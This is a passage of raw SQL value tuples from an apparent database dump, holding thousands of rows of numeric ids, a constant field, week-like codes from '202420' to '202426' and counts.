1,'202420',1),(3107,1,'202420',1),(3109,1,'202420',1),(3124,1,'202420',1),(3127,1,'202420',1),(3226,1,'202420',1),(3229,1,'202420',1),(3240,1,'202420',1),(3243,1,'202420',1),(3245,1,'202420',1),(3251,1,'202420',1),(3253,1,'202420',1),(3257,1,'202420',1),(3259,1,'202420',1),(3263,1,'202420',1),(3265,1,'202420',1),(3267,1,'202420',1),(3269,1,'202420',1),(3273,1,'202420',1),(3278,1,'202420',1),(3280,1,'202420',1),(3282,1,'202420',1),(3287,1,'202420',1),(3290,1,'202420',1),(3297,1,'202420',1),(3307,1,'202420',1),(3316,1,'202420',1),(3430,1,'202420',1),(3438,1,'202420',1),(3479,1,'202420',1),(3482,1,'202420',1),(3486,1,'202420',1),(3489,1,'202420',1),(3531,1,'202420',1),(3534,1,'202420',1),(3541,1,'202420',1),(3710,1,'202420',1),(3714,1,'202420',1),(3721,1,'202420',1),(3724,1,'202420',1),(3727,1,'202420',1),(3731,1,'202420',1),(3735,1,'202420',1),(3746,1,'202420',1),(3749,1,'202420',1),(3771,1,'202420',1),(3774,1,'202420',1),(4238,1,'202420',1),(4275,1,'202420',1),(4323,1,'202420',1),(4326,1,'202420',1),(4332,1,'202420',1),(4335,1,'202420',1),(4338,1,'202420',1),(4341,1,'202420',1),(4357,1,'202420',1),(4368,1,'202420',1),(4373,1,'202420',1),(4377,1,'202420',1),(4382,1,'202420',1),(4387,1,'202420',1),(4391,1,'202420',1),(4396,1,'202420',1),(4400,1,'202420',1),(4404,1,'202420',1),(4408,1,'202420',1),(4420,1,'202420',1),(4424,1,'202420',1),(4428,1,'202420',1),(4432,1,'202420',1),(4436,1,'202420',1),(4440,1,'202420',1),(4448,1,'202420',1),(4454,1,'202420',1),(4514,1,'202420',1),(4517,1,'202420',1),(4529,1,'202420',1),(4542,1,'202420',1),(4546,1,'202420',1),(4551,1,'202420',1),(4566,1,'202420',1),(4582,1,'202420',1),(4608,1,'202420',1),(4612,1,'202420',1),(4648,1,'202420',1),(4654,1,'202420',1),(4657,1,'202420',1),(4660,1,'202420',1),(4663,1,'202420',1),(4668,1,'202420',1),(4677,1,'202420',1),(4681,1,'202420',1),(4685,1,'202420',1),(4691,1,'202420',1),(4694,1,'202420',1),(4703,1,'202420',1),(4709,1,'202420',1),(4712,1,'202420',1),(4722,1,'202420',1),(4741,1,'202420',1),(4747,1,'202420',1),(4753,1,'202420',1),(4756,1,'202420',1),(4762,1,'202420',1),(4768,1,'202420',1),(4771,1,'202420',1),(4776,1,'202420',1),(4792,1,'202420',1),(4797,1,'202420',1),(4802,1,'202420',1),(4858,1,'202420',1),(4862,1,'202420',1),(4870,1,'202420',1),(4874,1,'202420',1),(4878,1,'202420',1),(4883,1,'202420',1),(4888,1,'202420',1),(4893,1,'202420',1),(4897,1,'202420',1),(4930,1,'202420',1),(4976,1,'202420',1),(4977,1,'202420',1),(4980,1,'202420',1),(4983,1,'202420',1),(4988,1,'202420',1),(4996,1,'202420',1),(5024,1,'202420',1),(5028,1,'202420',1),(5037,1,'202420',1),(5050,1,'202420',1),(5058,1,'202420',1),(5062,1,'202420',1),(5067,1,'202420',1),(5071,1,'202420',1),(5101,1,'202420',1),(5125,1,'202420',1),(5128,1,'202420',1),(5137,1,'202420',1),(5140,1,'202420',1),(5146,1,'202420',1),(5157,1,'202420',1),(5248,1,'202420',1),(5253,1,'202420',1),(5256,1,'202420',1),(5259,1,'202420',1),(5268,1,'202420',1),(5271,1,'202420',1),(5276,1,'202420',1),(5280,1,'202420',1),(5289,1,'202420',1),(5292,1,'202420',1),(5295,1,'202420',1),(5314,1,'202420',1),(5317,1,'202420',1),(5320,1,'202420',1),(5323,1,'202420',1),(5330,1,'202420',1),(5334,1,'202420',1),(5353,1,'202420',1),(5356,1,'202420',1),(5359,1,'202420',1),(5363,1,'202420',1),(5378,1,'202420',1),(74,1,'202420',2),(110,1,'202420',2),(488,1,'202420',2),(570,1,'202420',2),(1590,1,'202420',2),(1614,1,'202420',2),(1697,1,'202420',2),(1699,1,'202420',2),(1722,1,'202420',2),(2457,1,'202420',2),(2609,1,'202420',2),(2751,1,'202420',2),(2775,1,'202420',2),(2965,1,'202420',2),(3063,1,'202420',2),(3090,1,'202420',2),(3249,1,'202420',2),(3261,1,'202420',2),(3271,1,'202420',2),(3275,1,'202420',2),(3498,1,'202420',2),(3738,1,'202420',2),(4329,1,'202420',2),(4363,1,'202420',2),(4412,1,'202420',2),(4416,1,'202420',2),(4457,1,'202420',2),(4524,1,'202420',2),(4556,1,'202420',2),(4587,1,'202420',2),(4591,1,'202420',2),(4645,1,'202420',2),(4674,1,'202420',2),(4866,1,'202420',2),(5046,1,'202420',2),(5054,1,'202420',2),(5076,1,'202420',2),(5264,1,'202420',2),(5304,1,'202420',2),(5307,1,'202420',2),(5374,1,'202420',2),(76,1,'202420',3),(84,1,'202420',3),(473,1,'202420',3),(1544,1,'202420',3),(1596,1,'202420',3),(1600,1,'202420',3),(1701,1,'202420',3),(1711,1,'202420',3),(1747,1,'202420',3),(1780,1,'202420',3),(2152,1,'202420',3),(2165,1,'202420',3),(2904,1,'202420',3),(3023,1,'202420',3),(3041,1,'202420',3),(3083,1,'202420',3),(3117,1,'202420',3),(3752,1,'202420',3),(3764,1,'202420',3),(3781,1,'202420',3),(4301,1,'202420',3),(4444,1,'202420',3),(4697,1,'202420',3),(4744,1,'202420',3),(4750,1,'202420',3),(4765,1,'202420',3),(5033,1,'202420',3),(5080,1,'202420',3),(5131,1,'202420',3),(5163,1,'202420',3),(5310,1,'202420',3),(68,1,'202420',4),(1608,1,'202420',4),(3060,1,'202420',4),(3069,1,'202420',4),(3087,1,'202420',4),(5301,1,'202420',4),(2801,1,'202420',5),(3004,1,'202420',5),(3045,1,'202420',5),(3285,1,'202420',5),(3742,1,'202420',5),(4759,1,'202420',5),(5134,1,'202420',5),(89,1,'202420',6),(1582,1,'202420',6),(4520,1,'202420',6),(72,1,'202420',7),(87,1,'202420',7),(1749,1,'202420',7),(3313,1,'202420',7),(3777,1,'202420',7),(4688,1,'202420',7),(2309,1,'202420',8),(1586,1,'202420',9),(2148,1,'202420',10),(3247,1,'202420',21),(80,1,'202420',66),(9,1,'202420',9447),(91,1,'202421',1),(468,1,'202421',1),(474,1,'202421',1),(479,1,'202421',1),(482,1,'202421',1),(487,1,'202421',1),(1584,1,'202421',1),(1590,1,'202421',1),(1596,1,'202421',1),(1598,1,'202421',1),(1600,1,'202421',1),(1604,1,'202421',1),(1610,1,'202421',1),(1703,1,'202421',1),(1713,1,'202421',1),(1743,1,'202421',1),(1768,1,'202421',1),(2154,1,'202421',1),(2159,1,'202421',1),(2704,1,'202421',1),(2751,1,'202421',1),(2809,1,'202421',1),(2904,1,'202421',1),(2964,1,'202421',1),(2965,1,'202421',1),(3004,1,'202421',1),(3023,1,'202421',1),(3034,1,'202421',1),(3102,1,'202421',1),(3243,1,'202421',1),(3263,1,'202421',1),(3265,1,'202421',1),(3275,1,'202421',1),(3282,1,'202421',1),(3498,1,'202421',1),(3724,1,'202421',1),(3774,1,'202421',1),(4323,1,'202421',1),(4341,1,'202421',1),(4412,1,'202421',1),(4457,1,'202421',1),(4542,1,'202421',1),(4546,1,'202421',1),(4551,1,'202421',1),(4566,1,'202421',1),(4582,1,'202421',1),(4657,1,'202421',1),(4691,1,'202421',1),(4694,1,'202421',1),(4700,1,'202421',1),(4747,1,'202421',1),(4753,1,'202421',1),(4756,1,'202421',1),(4762,1,'202421',1),(4776,1,'202421',1),(4983,1,'202421',1),(4988,1,'202421',1),(5042,1,'202421',1),(5062,1,'202421',1),(5122,1,'202421',1),(5264,1,'202421',1),(5298,1,'202421',1),(5314,1,'202421',1),(5320,1,'202421',1),(5334,1,'202421',1),(87,1,'202421',2),(473,1,'202421',2),(1614,1,'202421',2),(1711,1,'202421',2),(2769,1,'202421',2),(2804,1,'202421',2),(3005,1,'202421',2),(3267,1,'202421',2),(3438,1,'202421',2),(3752,1,'202421',2),(3764,1,'202421',2),(4301,1,'202421',2),(4329,1,'202421',2),(4368,1,'202421',2),(4420,1,'202421',2),(4697,1,'202421',2),(4750,1,'202421',2),(4874,1,'202421',2),(4930,1,'202421',2),(5028,1,'202421',2),(5276,1,'202421',2),(5292,1,'202421',2),(89,1,'202421',3),(335,1,'202421',3),(1770,1,'202421',3),(2309,1,'202421',3),(3104,1,'202421',3),(3249,1,'202421',3),(3261,1,'202421',3),(4238,1,'202421',3),(5359,1,'202421',3),(72,1,'202421',4),(1544,1,'202421',4),(1582,1,'202421',4),(1749,1,'202421',4),(2956,1,'202421',4),(3060,1,'202421',4),(4977,1,'202421',4),(4980,1,'202421',4),(5076,1,'202421',4),(5128,1,'202421',4),(5301,1,'202421',4),(2063,1,'202421',5),(5024,1,'202421',5),(5310,1,'202421',5),(1586,1,'202421',6),(3107,1,'202421',6),(3251,1,'202421',6),(3771,1,'202421',6),(3781,1,'202421',6),(4416,1,'202421',6),(4771,1,'202421',6),(5020,1,'202421',6),(5163,1,'202421',6),(5289,1,'202421',6),(4520,1,'202421',7),(5125,1,'202421',8),(2609,1,'202421',9),(2148,1,'202421',11),(3247,1,'202421',11),(68,1,'202421',27),(80,1,'202421',62),(9,1,'202421',9325),(84,1,'202422',1),(91,1,'202422',1),(110,1,'202422',1),(467,1,'202422',1),(469,1,'202422',1),(471,1,'202422',1),(473,1,'202422',1),(474,1,'202422',1),(480,1,'202422',1),(485,1,'202422',1),(487,1,'202422',1),(488,1,'202422',1),(1544,1,'202422',1),(1590,1,'202422',1),(1602,1,'202422',1),(1606,1,'202422',1),(1703,1,'202422',1),(1707,1,'202422',1),(1709,1,'202422',1),(1715,1,'202422',1),(1722,1,'202422',1),(1726,1,'202422',1),(1745,1,'202422',1),(1780,1,'202422',1),(2152,1,'202422',1),(2154,1,'202422',1),(2309,1,'202422',1),(2457,1,'202422',1),(2775,1,'202422',1),(2989,1,'202422',1),(2991,1,'202422',1),(3004,1,'202422',1),(3027,1,'202422',1),(3041,1,'202422',1),(3063,1,'202422',1),(3087,1,'202422',1),(3124,1,'202422',1),(3240,1,'202422',1),(3245,1,'202422',1),(3249,1,'202422',1),(3259,1,'202422',1),(3278,1,'202422',1),(3297,1,'202422',1),(3307,1,'202422',1),(3482,1,'202422',1),(3534,1,'202422',1),(3541,1,'202422',1),(4332,1,'202422',1),(4404,1,'202422',1),(4440,1,'202422',1),(4448,1,'202422',1),(4454,1,'202422',1),(4514,1,'202422',1),(4517,1,'202422',1),(4551,1,'202422',1),(4591,1,'202422',1),(4612,1,'202422',1),(4651,1,'202422',1),(4657,1,'202422',1),(4660,1,'202422',1),(4668,1,'202422',1),(4674,1,'202422',1),(4677,1,'202422',1),(4697,1,'202422',1),(4703,1,'202422',1),(4712,1,'202422',1),(4741,1,'202422',1),(4753,1,'202422',1),(4762,1,'202422',1),(4768,1,'202422',1),(4858,1,'202422',1),(4883,1,'202422',1),(4976,1,'202422',1),(4980,1,'202422',1),(4983,1,'202422',1),(5037,1,'202422',1),(5050,1,'202422',1),(5071,1,'202422',1),(5080,1,'202422',1),(5101,1,'202422',1),(5122,1,'202422',1),(5128,1,'202422',1),(5137,1,'202422',1),(5268,1,'202422',1),(5298,1,'202422',1),(5301,1,'202422',1),(5304,1,'202422',1),(5307,1,'202422',1),(5310,1,'202422',1),(5314,1,'202422',1),(5317,1,'202422',1),(5320,1,'202422',1),(5323,1,'202422',1),(72,1,'202422',2),(468,1,'202422',2),(470,1,'202422',2),(1734,1,'202422',2),(1743,1,'202422',2),(1766,1,'202422',2),(2156,1,'202422',2),(2503,1,'202422',2),(2804,1,'202422',2),(2809,1,'202422',2),(2813,1,'202422',2),(2904,1,'202422',2),(3006,1,'202422',2),(3023,1,'202422',2),(3030,1,'202422',2),(3267,1,'202422',2),(3273,1,'202422',2),(3498,1,'202422',2),(3710,1,'202422',2),(3714,1,'202422',2),(4329,1,'202422',2),(4382,1,'202422',2),(4408,1,'202422',2),(4420,1,'202422',2),(4457,1,'202422',2),(4524,1,'202422',2),(4645,1,'202422',2),(4648,1,'202422',2),(4681,1,'202422',2),(4706,1,'202422',2),(4744,1,'202422',2),(4776,1,'202422',2),(4930,1,'202422',2),(4996,1,'202422',2),(5042,1,'202422',2),(5058,1,'202422',2),(5062,1,'202422',2),(5146,1,'202422',2),(5163,1,'202422',2),(5280,1,'202422',2),(5289,1,'202422',2),(5356,1,'202422',2),(5359,1,'202422',2),(1582,1,'202422',3),(1614,1,'202422',3),(1695,1,'202422',3),(1724,1,'202422',3),(1732,1,'202422',3),(3489,1,'202422',3),(3531,1,'202422',3),(4416,1,'202422',3),(4802,1,'202422',3),(4866,1,'202422',3),(5076,1,'202422',3),(89,1,'202422',4),(1594,1,'202422',4),(1711,1,'202422',4),(1728,1,'202422',4),(1749,1,'202422',4),(2063,1,'202422',4),(3104,1,'202422',4),(3261,1,'202422',4),(3438,1,'202422',4),(3771,1,'202422',4),(4301,1,'202422',4),(4759,1,'202422',4),(1586,1,'202422',5),(3127,1,'202422',5),(87,1,'202422',6),(3060,1,'202422',6),(3746,1,'202422',6),(3749,1,'202422',6),(1600,1,'202422',7),(4520,1,'202422',7),(3781,1,'202422',9),(2148,1,'202422',10),(3247,1,'202422',23),(68,1,'202422',38),(80,1,'202422',46),(9,1,'202422',8255),(84,1,'202423',1),(110,1,'202423',1),(335,1,'202423',1),(470,1,'202423',1),(471,1,'202423',1),(473,1,'202423',1),(474,1,'202423',1),(477,1,'202423',1),(481,1,'202423',1),(570,1,'202423',1),(1590,1,'202423',1),(1592,1,'202423',1),(1604,1,'202423',1),(1614,1,'202423',1),(1699,1,'202423',1),(1715,1,'202423',1),(1718,1,'202423',1),(1720,1,'202423',1),(1745,1,'202423',1),(1747,1,'202423',1),(1751,1,'202423',1),(1770,1,'202423',1),(1782,1,'202423',1),(2150,1,'202423',1),(2152,1,'202423',1),(2248,1,'202423',1),(2296,1,'202423',1),(2297,1,'202423',1),(2309,1,'202423',1),(2457,1,'202423',1),(2558,1,'202423',1),(2804,1,'202423',1),(2809,1,'202423',1),(2813,1,'202423',1),(2904,1,'202423',1),(2956,1,'202423',1),(2965,1,'202423',1),(2993,1,'202423',1),(3004,1,'202423',1),(3060,1,'202423',1),(3066,1,'202423',1),(3069,1,'202423',1),(3083,1,'202423',1),(3090,1,'202423',1),(3117,1,'202423',1),(3124,1,'202423',1),(3229,1,'202423',1),(3243,1,'202423',1),(3245,1,'202423',1),(3259,1,'202423',1),(3261,1,'202423',1),(3263,1,'202423',1),(3273,1,'202423',1),(3275,1,'202423',1),(3280,1,'202423',1),(3282,1,'202423',1),(3285,1,'202423',1),(3287,1,'202423',1),(3313,1,'202423',1),(3316,1,'202423',1),(3486,1,'202423',1),(3489,1,'202423',1),(3498,1,'202423',1),(3738,1,'202423',1),(3742,1,'202423',1),(3771,1,'202423',1),(4238,1,'202423',1),(4275,1,'202423',1),(4301,1,'202423',1),(4326,1,'202423',1),(4335,1,'202423',1),(4338,1,'202423',1),(4404,1,'202423',1),(4420,1,'202423',1),(4444,1,'202423',1),(4524,1,'202423',1),(4529,1,'202423',1),(4566,1,'202423',1),(4591,1,'202423',1),(4651,1,'202423',1),(4654,1,'202423',1),(4663,1,'202423',1),(4668,1,'202423',1),(4688,1,'202423',1),(4700,1,'202423',1),(4706,1,'202423',1),(4709,1,'202423',1),(4712,1,'202423',1),(4741,1,'202423',1),(4747,1,'202423',1),(4768,1,'202423',1),(4883,1,'202423',1),(5028,1,'202423',1),(5037,1,'202423',1),(5058,1,'202423',1),(5080,1,'202423',1),(5101,1,'202423',1),(5131,1,'202423',1),(5134,1,'202423',1),(5253,1,'202423',1),(5259,1,'202423',1),(5289,1,'202423',1),(5292,1,'202423',1),(5295,1,'202423',1),(5298,1,'202423',1),(5301,1,'202423',1),(5304,1,'202423',1),(5326,1,'202423',1),(5330,1,'202423',1),(5356,1,'202423',1),(74,1,'202423',2),(468,1,'202423',2),(1544,1,'202423',2),(1582,1,'202423',2),(1596,1,'202423',2),(1598,1,'202423',2),(1600,1,'202423',2),(1749,1,'202423',2),(2156,1,'202423',2),(2609,1,'202423',2),(3079,1,'202423',2),(3127,1,'202423',2),(3735,1,'202423',2),(3764,1,'202423',2),(4432,1,'202423',2),(4551,1,'202423',2),(4587,1,'202423',2),(4722,1,'202423',2),(4776,1,'202423',2),(4983,1,'202423',2),(5024,1,'202423',2),(5067,1,'202423',2),(5122,1,'202423',2),(5137,1,'202423',2),(5310,1,'202423',2),(5363,1,'202423',2),(1602,1,'202423',3),(2293,1,'202423',3),(2911,1,'202423',3),(3226,1,'202423',3),(3710,1,'202423',3),(4391,1,'202423',3),(4520,1,'202423',3),(4759,1,'202423',3),(4866,1,'202423',3),(5076,1,'202423',3),(5314,1,'202423',3),(91,1,'202423',4),(1695,1,'202423',4),(1724,1,'202423',4),(1728,1,'202423',4),(3749,1,'202423',4),(4412,1,'202423',4),(4765,1,'202423',4),(4996,1,'202423',4),(5071,1,'202423',4),(5146,1,'202423',4),(87,1,'202423',5),(2165,1,'202423',5),(3023,1,'202423',5),(4514,1,'202423',6),(3247,1,'202423',7),(1766,1,'202423',8),(89,1,'202423',9),(2148,1,'202423',10),(1586,1,'202423',12),(3781,1,'202423',20),(3249,1,'202423',21),(68,1,'202423',28),(80,1,'202423',59),(9,1,'202423',10072),(72,1,'202424',1),(76,1,'202424',1),(91,1,'202424',1),(110,1,'202424',1),(467,1,'202424',1),(468,1,'202424',1),(469,1,'202424',1),(471,1,'202424',1),(476,1,'202424',1),(477,1,'202424',1),(479,1,'202424',1),(480,1,'202424',1),(487,1,'202424',1),(488,1,'202424',1),(1584,1,'202424',1),(1588,1,'202424',1),(1596,1,'202424',1),(1604,1,'202424',1),(1606,1,'202424',1),(1608,1,'202424',1),(1610,1,'202424',1),(1612,1,'202424',1),(1614,1,'202424',1),(1697,1,'202424',1),(1699,1,'202424',1),(1701,1,'202424',1),(1715,1,'202424',1),(1718,1,'202424',1),(1722,1,'202424',1),(1732,1,'202424',1),(1737,1,'202424',1),(1739,1,'202424',1),(1741,1,'202424',1),(1745,1,'202424',1),(1747,1,'202424',1),(1751,1,'202424',1),(1768,1,'202424',1),(1772,1,'202424',1),(1774,1,'202424',1),(1776,1,'202424',1),(1780,1,'202424',1),(2063,1,'202424',1),(2150,1,'202424',1),(2156,1,'202424',1),(2159,1,'202424',1),(2161,1,'202424',1),(2248,1,'202424',1),(2252,1,'202424',1),(2296,1,'202424',1),(2297,1,'202424',1),(2457,1,'202424',1),(2558,1,'202424',1),(2658,1,'202424',1),(2704,1,'202424',1),(2748,1,'202424',1),(2751,1,'202424',1),(2769,1,'202424',1),(2801,1,'202424',1),(2804,1,'202424',1),(2956,1,'202424',1),(2965,1,'202424',1),(2989,1,'202424',1),(2993,1,'202424',1),(3006,1,'202424',1),(3027,1,'202424',1),(3030,1,'202424',1),(3034,1,'202424',1),(3038,1,'202424',1),(3045,1,'202424',1),(3063,1,'202424',1),(3066,1,'202424',1),(3069,1,'202424',1),(3072,1,'202424',1),(3083,1,'202424',1),(3090,1,'202424',1),(3097,1,'202424',1),(3102,1,'202424',1),(3104,1,'202424',1),(3107,1,'202424',1),(3109,1,'202424',1),(3117,1,'202424',1),(3226,1,'202424',1),(3229,1,'202424',1),(3240,1,'202424',1),(3251,1,'202424',1),(3253,1,'202424',1),(3263,1,'202424',1),(3265,1,'202424',1),(3267,1,'202424',1),(3269,1,'202424',1),(3275,1,'202424',1),(3278,1,'202424',1),(3280,1,'202424',1),(3282,1,'202424',1),(3285,1,'202424',1),(3287,1,'202424',1),(3290,1,'202424',1),(3297,1,'202424',1),(3307,1,'202424',1),(3313,1,'202424',1),(3316,1,'202424',1),(3430,1,'202424',1),(3438,1,'202424',1),(3482,1,'202424',1),(3486,1,'202424',1),(3498,1,'202424',1),(3534,1,'202424',1),(3541,1,'202424',1),(3724,1,'202424',1),(3727,1,'202424',1),(3731,1,'202424',1),(3735,1,'202424',1),(3742,1,'202424',1),(3752,1,'202424',1),(3764,1,'202424',1),(3774,1,'202424',1),(3777,1,'202424',1),(4238,1,'202424',1),(4275,1,'202424',1),(4301,1,'202424',1),(4323,1,'202424',1),(4326,1,'202424',1),(4329,1,'202424',1),(4332,1,'202424',1),(4338,1,'202424',1),(4341,1,'202424',1),(4357,1,'202424',1),(4368,1,'202424',1),(4373,1,'202424',1),(4377,1,'202424',1),(4382,1,'202424',1),(4387,1,'202424',1),(4400,1,'202424',1),(4428,1,'202424',1),(4432,1,'202424',1),(4436,1,'202424',1),(4440,1,'202424',1),(4444,1,'202424',1),(4454,1,'202424',1),(4517,1,'202424',1),(4520,1,'202424',1),(4529,1,'202424',1),(4542,1,'202424',1),(4546,1,'202424',1),(4556,1,'202424',1),(4566,1,'202424',1),(4582,1,'202424',1),(4587,1,'202424',1),(4591,1,'202424',1),(4608,1,'202424',1),(4612,1,'202424',1),(4645,1,'202424',1),(4651,1,'202424',1),(4654,1,'202424',1),(4657,1,'202424',1),(4663,1,'202424',1),(4668,1,'202424',1),(4674,1,'202424',1),(4677,1,'202424',1),(4681,1,'202424',1),(4685,1,'202424',1),(4688,1,'202424',1),(4691,1,'202424',1),(4694,1,'202424',1),(4697,1,'202424',1),(4709,1,'202424',1),(4712,1,'202424',1),(4741,1,'202424',1),(4744,1,'202424',1),(4747,1,'202424',1),(4750,1,'202424',1),(4753,1,'202424',1),(4756,1,'202424',1),(4762,1,'202424',1),(4765,1,'202424',1),(4768,1,'202424',1),(4771,1,'202424',1),(4792,1,'202424',1),(4862,1,'202424',1),(4866,1,'202424',1),(4874,1,'202424',1),(4878,1,'202424',1),(4883,1,'202424',1),(4888,1,'202424',1),(4893,1,'202424',1),(4897,1,'202424',1),(4930,1,'202424',1),(4976,1,'202424',1),(4977,1,'202424',1),(4980,1,'202424',1),(4988,1,'202424',1),(5028,1,'202424',1),(5037,1,'202424',1),(5046,1,'202424',1),(5054,1,'202424',1),(5058,1,'202424',1),(5062,1,'202424',1),(5067,1,'202424',1),(5071,1,'202424',1),(5122,1,'202424',1),(5125,1,'202424',1),(5128,1,'202424',1),(5137,1,'202424',1),(5140,1,'202424',1),(5163,1,'202424',1),(5248,1,'202424',1),(5256,1,'202424',1),(5259,1,'202424',1),(5264,1,'202424',1),(5268,1,'202424',1),(5271,1,'202424',1),(5280,1,'202424',1),(5295,1,'202424',1),(5304,1,'202424',1),(5307,1,'202424',1),(5310,1,'202424',1),(5314,1,'202424',1),(5320,1,'202424',1),(5330,1,'202424',1),(5334,1,'202424',1),(5353,1,'202424',1),(5356,1,'202424',1),(5359,1,'202424',1),(5363,1,'202424',1),(5374,1,'202424',1),(5378,1,'202424',1),(74,1,'202424',2),(108,1,'202424',2),(482,1,'202424',2),(1544,1,'202424',2),(1586,1,'202424',2),(1592,1,'202424',2),(1600,1,'202424',2),(1703,1,'202424',2),(1705,1,'202424',2),(1724,1,'202424',2),(1726,1,'202424',2),(1743,1,'202424',2),(1770,1,'202424',2),(1782,1,'202424',2),(2154,1,'202424',2),(2503,1,'202424',2),(2617,1,'202424',2),(2809,1,'202424',2),(2813,1,'202424',2),(2904,1,'202424',2),(2964,1,'202424',2),(2991,1,'202424',2),(3004,1,'202424',2),(3005,1,'202424',2),(3041,1,'202424',2),(3092,1,'202424',2),(3096,1,'202424',2),(3124,1,'202424',2),(3245,1,'202424',2),(3249,1,'202424',2),(3257,1,'202424',2),(3259,1,'202424',2),(3261,1,'202424',2),(3479,1,'202424',2),(3531,1,'202424',2),(3710,1,'202424',2),(3721,1,'202424',2),(3738,1,'202424',2),(3771,1,'202424',2),(4335,1,'202424',2),(4396,1,'202424',2),(4404,1,'202424',2),(4408,1,'202424',2),(4424,1,'202424',2),(4524,1,'202424',2),(4551,1,'202424',2),(4648,1,'202424',2),(4660,1,'202424',2),(4703,1,'202424',2),(4722,1,'202424',2),(4776,1,'202424',2),(4797,1,'202424',2),(4802,1,'202424',2),(4870,1,'202424',2),(4983,1,'202424',2),(4996,1,'202424',2),(5050,1,'202424',2),(5101,1,'202424',2),(5131,1,'202424',2),(5289,1,'202424',2),(5292,1,'202424',2),(5301,1,'202424',2),(5317,1,'202424',2),(84,1,'202424',3),(89,1,'202424',3),(335,1,'202424',3),(472,1,'202424',3),(473,1,'202424',3),(1598,1,'202424',3),(2293,1,'202424',3),(2309,1,'202424',3),(3023,1,'202424',3),(3087,1,'202424',3),(3273,1,'202424',3),(4391,1,'202424',3),(4412,1,'202424',3),(4416,1,'202424',3),(4514,1,'202424',3),(4759,1,'202424',3),(4858,1,'202424',3),(5024,1,'202424',3),(5076,1,'202424',3),(1602,1,'202424',4),(2609,1,'202424',4),(2911,1,'202424',4),(3079,1,'202424',4),(4363,1,'202424',4),(5080,1,'202424',4),(1582,1,'202424',5),(1707,1,'202424',5),(2152,1,'202424',5),(2165,1,'202424',5),(3489,1,'202424',5),(3714,1,'202424',5),(3746,1,'202424',5),(3749,1,'202424',5),(5276,1,'202424',5),(1590,1,'202424',6),(1711,1,'202424',6),(1749,1,'202424',6),(3127,1,'202424',6),(3243,1,'202424',7),(4420,1,'202424',7),(4448,1,'202424',7),(4457,1,'202424',7),(87,1,'202424',8),(5157,1,'202424',8),(1766,1,'202424',9),(2148,1,'202424',12),(3060,1,'202424',12),(3781,1,'202424',12),(3247,1,'202424',23),(68,1,'202424',29),(80,1,'202424',45),(9,1,'202424',8821),(74,1,'202425',1),(76,1,'202425',1),(335,1,'202425',1),(467,1,'202425',1),(468,1,'202425',1),(471,1,'202425',1),(488,1,'202425',1),(1584,1,'202425',1),(1598,1,'202425',1),(1600,1,'202425',1),(1602,1,'202425',1),(1604,1,'202425',1),(1766,1,'202425',1),(1768,1,'202425',1),(2063,1,'202425',1),(2457,1,'202425',1),(2904,1,'202425',1),(2989,1,'202425',1),(3004,1,'202425',1),(3030,1,'202425',1),(3038,1,'202425',1),(3102,1,'202425',1),(3731,1,'202425',1),(3735,1,'202425',1),(3742,1,'202425',1),(3781,1,'202425',1),(4391,1,'202425',1),(4400,1,'202425',1),(4412,1,'202425',1),(4420,1,'202425',1),(4454,1,'202425',1),(4520,1,'202425',1),(4551,1,'202425',1),(4582,1,'202425',1),(4591,1,'202425',1),(4703,1,'202425',1),(4741,1,'202425',1),(4878,1,'202425',1),(4996,1,'202425',1),(5067,1,'202425',1),(5140,1,'202425',1),(5256,1,'202425',1),(5310,1,'202425',1),(5314,1,'202425',1),(5356,1,'202425',1),(108,1,'202425',2),(486,1,'202425',2),(1544,1,'202425',2),(1582,1,'202425',2),(1594,1,'202425',2),(1614,1,'202425',2),(1734,1,'202425',2),(1751,1,'202425',2),(2159,1,'202425',2),(2178,1,'202425',2),(2617,1,'202425',2),(2658,1,'202425',2),(3005,1,'202425',2),(3124,1,'202425',2),(3249,1,'202425',2),(3430,1,'202425',2),(3531,1,'202425',2),(3541,1,'202425',2),(3749,1,'202425',2),(4416,1,'202425',2),(4759,1,'202425',2),(4858,1,'202425',2),(4862,1,'202425',2),(5131,1,'202425',2),(5292,1,'202425',2),(2769,1,'202425',3),(3771,1,'202425',3),(4338,1,'202425',3),(4457,1,'202425',3),(4722,1,'202425',3),(1596,1,'202425',4),(1606,1,'202425',4),(1718,1,'202425',4),(1749,1,'202425',4),(2293,1,'202425',4),(2309,1,'202425',4),(3117,1,'202425',4),(3127,1,'202425',4),(3245,1,'202425',4),(3746,1,'202425',4),(4332,1,'202425',4),(4524,1,'202425',4),(5076,1,'202425',4),(5276,1,'202425',4),(84,1,'202425',5),(89,1,'202425',5),(1586,1,'202425',5),(3023,1,'202425',5),(87,1,'202425',6),(3066,1,'202425',6),(4440,1,'202425',6),(1770,1,'202425',7),(4448,1,'202425',7),(2148,1,'202425',10),(3060,1,'202425',10),(2609,1,'202425',12),(68,1,'202425',37),(80,1,'202425',64),(3764,1,'202425',75),(3247,1,'202425',76),(9,1,'202425',6877),(76,1,'202426',1),(91,1,'202426',1),(102,1,'202426',1),(106,1,'202426',1),(335,1,'202426',1),(467,1,'202426',1),(470,1,'202426',1),(471,1,'202426',1),(476,1,'202426',1),(480,1,'202426',1),(481,1,'202426',1),(482,1,'202426',1),(485,1,'202426',1),(486,1,'202426',1),(570,1,'202426',1),(1582,1,'202426',1),(1584,1,'202426',1),(1588,1,'202426',1),(1592,1,'202426',1),(1596,1,'202426',1),(1604,1,'202426',1),(1608,1,'202426',1),(1614,1,'202426',1),(1695,1,'202426',1),(1697,1,'202426',1),(1699,1,'202426',1),(1703,1,'202426',1),(1709,1,'202426',1),(1711,1,'202426',1),(1713,1,'202426',1),(1715,1,'202426',1),(1718,1,'202426',1),(1720,1,'202426',1),(1722,1,'202426',1),(1724,1,'202426',1),(1726,1,'202426',1),(1728,1,'202426',1),(1737,1,'202426',1),(1741,1,'202426',1),(1745,1,'202426',1),(1766,1,'202426',1),(1768,1,'202426',1),(1776,1,'202426',1),(1782,1,'202426',1),(2063,1,'202426',1),(2150,1,'202426',1),(2161,1,'202426',1),(2248,1,'202426',1),(2296,1,'202426',1),(2457,1,'202426',1),(2558,1,'202426',1),(2617,1,'202426',1),(2748,1,'202426',1),(2751,1,'202426',1),(2775,1,'202426',1),(2804,1,'202426',1),(2813,1,'202426',1),(3034,1,'202426',1),(3045,1,'202426',1),(3066,1,'202426',1),(3090,1,'202426',1),(3092,1,'202426',1),(3096,1,'202426',1),(3097,1,'202426',1),(3104,1,'202426',1),(3109,1,'202426',1),(3117,1,'202426',1),(3124,1,'202426',1),(3229,1,'202426',1),(3240,1,'202426',1),(3243,1,'202426',1),(3245,1,'202426',1),(3249,1,'202426',1),(3251,1,'202426',1),(3253,1,'202426',1),(3257,1,'202426',1),(3259,1,'202426',1),(3261,1,'202426',1